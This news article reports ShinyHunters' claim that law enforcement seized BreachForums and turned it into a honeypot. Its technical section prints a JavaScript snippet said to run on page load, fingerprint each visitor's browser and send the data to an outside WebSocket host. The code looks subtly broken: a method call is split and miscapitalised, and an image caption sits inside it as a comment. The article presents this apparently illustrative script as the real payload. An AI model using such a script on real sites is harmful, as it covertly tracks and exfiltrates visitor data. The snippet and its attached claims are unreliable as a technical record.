ShinyHunters Unveils That BreachForums Taken by Law Enforcement Agencies, Now It Is a Honeypot

Cyber Security News
3m read

The threat actor collective ShinyHunters has recently announced that BreachForums—one of the most prolific breeding grounds for stolen credentials and leak data—has been commandeered by international law enforcement agencies.

According to Shiny from ShinyHunters, the site’s administrative controls, including the accounts “Hollow,” “ShinyHunters,” and the original “Founder,” now operate under the oversight of French authorities in coordination with the FBI.

Initial reports suggest that users attempting to log in to the forum are unknowingly submitting their credentials and device fingerprints into a sophisticated honeypot designed to trace and identify criminal actors.

Following the announcement, the forum was taken offline (Source – X)

BreachForums first emerged as a successor to several defunct leak-sharing platforms, quickly attracting cybercriminals by offering an encrypted messaging system and built-in scraping tools to harvest breached databases automatically.

Its primary attack vectors included SQL injection exploits against poorly secured partner sites and a proprietary botnet that distributed phishing kits.

Hackmanac analysts identified anomalous traffic patterns and injection payloads embedded in login redirects as early as July 2025, suggesting that site modifications were underway to convert the forum into a trap for its own user base.

The impact on the underground economy is profound: data sellers and leakers are now reluctant to share or purchase sensitive information, fearing exposure.

Victims of credential stuffing campaigns may see an uptick in targeted enforcement operations, as honeypot captures provide actionable intelligence on device fingerprints, IP geolocation, and intrusion tools.

The initiative reflects a broader trend of law enforcement leveraging deception operations to disrupt cybercrime ecosystems.

Infection Mechanism and Honeypot Payloads

Delving deeper into BreachForums’ transformation, the honeypot injects a stealth JavaScript snippet into every served page.

Shiny from ShinyHunters announced that BreachForums that has been restored is compromised and is now operated by French law enforcement in coordination with the FBI (Source – X)

This script silently fingerprints browsers and exfiltrates session information via an encrypted WebSocket channel:-

// Figure 1: honeypot_architecture.png
(function() {
  const socket = new WebSocket("wss://leaktrack.law/honeypot");
  socket.onopen = () => {
    const fingerprint = {
      ua: navigator.userAgent,
      plugins: navigator.plugins.length,
      time: Date.now()
    };
    socket. Send(btoa(JSON.stringify(fingerprint)));
  };
  socket.onmessage = (evt) => {
    console.log("Honeypot response:", atob(evt.data));
  };
})();

This payload executes immediately upon page load, collecting user-agent strings, installed plugin counts, and precise timestamps before transmitting them to law enforcement servers.

Additional persistence tactics include dynamically generated iframe embeds that reconnect every five minutes, ensuring that even passive visitors are continuously monitored.

Through this design, the authorities can correlate login attempts with real-world identities, effectively turning BreachForums into a digital dragnet.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post ShinyHunters Unveils That BreachForums Taken by Law Enforcement Agencies, Now It Is a Honeypot appeared first on Cyber Security News.

cybersecuritynews.com